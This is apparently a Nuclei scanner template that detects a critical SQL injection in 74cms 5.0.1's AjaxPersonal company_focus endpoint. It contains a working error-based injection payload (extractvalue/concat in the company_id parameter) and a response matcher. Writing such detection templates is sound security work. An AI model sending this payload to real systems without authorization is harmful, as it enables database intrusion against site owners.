id: 74cms-sqli

info:
  name: 74cms Sql Injection
  author: princechaddha
  severity: critical
  description: A SQL injection vulnerability exists in 74cms 5.0.1 AjaxPersonalController.class.php.
  reference:
    - https://github.com/possib1e/vuln/issues/3
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-89
  metadata:
    max-request: 1
  tags: 骑士-74CMS
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test") and extractvalue(1,concat(0x7e,md5({{num}}))) -- a'

    matchers:
      - type: word
        words:
          - '{{md5({{num}})}}'
        part: body

# digest: 490a00463044022034f618b8db990da1b1532c6ed21af8818930d3c944f797fa20db64f4756eabc6022046a619ac80a25fc05ac38f302f428c66107de20d6c2467b35a8a5594c852c061:922c64590222798bb761d5b6d8e72950
